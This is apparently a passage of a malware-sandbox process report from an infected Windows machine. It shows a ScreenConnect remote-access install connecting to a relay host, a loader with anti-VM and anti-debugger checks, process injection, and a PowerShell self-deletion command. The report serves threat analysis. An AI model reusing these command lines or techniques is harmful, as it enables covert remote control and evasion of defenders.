      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12056
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12064
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12072
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12080
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12088
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12096
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12104
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12112
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12120
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12128
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12136
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12144
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12152
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12160
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12168
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12176
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12184
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12192
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12200
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12208
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12216
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12224
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12232
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12240
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12248
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12256
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12264
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12272
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12280
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12292
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12300
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12308
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12316
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12324
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12332
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12340
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12348
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12356
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12364
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12372
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12380
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12388
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12396
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12404
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12412
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12420
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12428
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12436
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12444
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12452
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12460
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12468
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12476
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12484
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12492
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12500
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12508
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12516
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12524
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12532
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12540
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12548
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12556
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12564
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12572
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12580
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12588
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12596
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12604
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12612
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12620
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12628
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12636
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12644
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12652
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12660
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12668
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12676
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12692
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12704
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12724
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12732
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12740
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12748
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12756
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12764
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12772
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12780
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12788
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12796
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12804
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12812
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12820
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12828
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12836
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12844
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12852
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12860
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12868
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12876
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12884
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12892
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12900
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12908
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12916
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12924
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12932
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12940
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12948
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12956
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12964
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12972
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12980
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12988
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:12996
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:13004
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:13016
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:13024
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:13032
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:13040
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:13048
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:13056
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:13064
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:13072
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:13080
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:13088
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:13096
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:13104
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:13112
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:13120
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:13128
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:13136
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:13144
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:13152
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:13160
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:13168
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:13176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3168 -ip 3168
1⤵
PID:1540

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Boot or Logon Autostart Execution: Authentication Package
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2984
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding B172646FC613DD74633BE060FD6BBCD4 C
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4224
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIECA2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240643328 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:4092
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:3968
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 08169F5C275AD5ADD913FB9A39984B96
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:824
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 193ADFB956F05106EF83864412638BF4 E Global\MSI0000
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:3168

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:4236

C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-m858nm-relay.screenconnect.com&p=443&s=aeaf4b13-6784-48f3-b202-0af1b5ebb536&k=BgIAAACkAABSU0ExAAgAAAEAAQAVnkKvoJ2a5Owy72d6CsGdKvHoeDC4B57FaJ6Hxr4F3MVrvri8W9EBpR76DnouoQOLdhagN9jXLv1DU9oYtbUyE5f22RxeyKb5ACDc8ergbSKA6QVCTyTw%2b3U%2fOzjOQHcKvuOA1wvUksct4fMl%2fH6deBklLuXsqF5i5v%2be0%2fy69N3M%2byB6qBKOsSPdQFoez5pkMEvZ%2bP26YFGRbMQy7WBZp%2bnngJN34UsDIkAV0RR4%2foS8UwkCPPERznjyO7T3iiIpbJgk9Xyyo9LATv0PIVIobYuVGgw6FX9yR8iM6FgVacp6H5r7KSQo5HS13%2bcfCkJbSoce8r%2fzHSz0DB93mjez"
1⤵
- Sets service image path in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5072
- C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\ScreenConnect.WindowsClient.exe" "RunRole" "d636bca0-d0c5-4c1f-8611-5e4afd19e9a4" "User"
  2⤵
  - Executes dropped EXE
  PID:5436
- C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\ScreenConnect.WindowsClient.exe" "RunRole" "6a9a97d8-fa2c-438c-9f46-347877682af8" "System"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:5628

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4196

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6492

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1044
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:3628
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
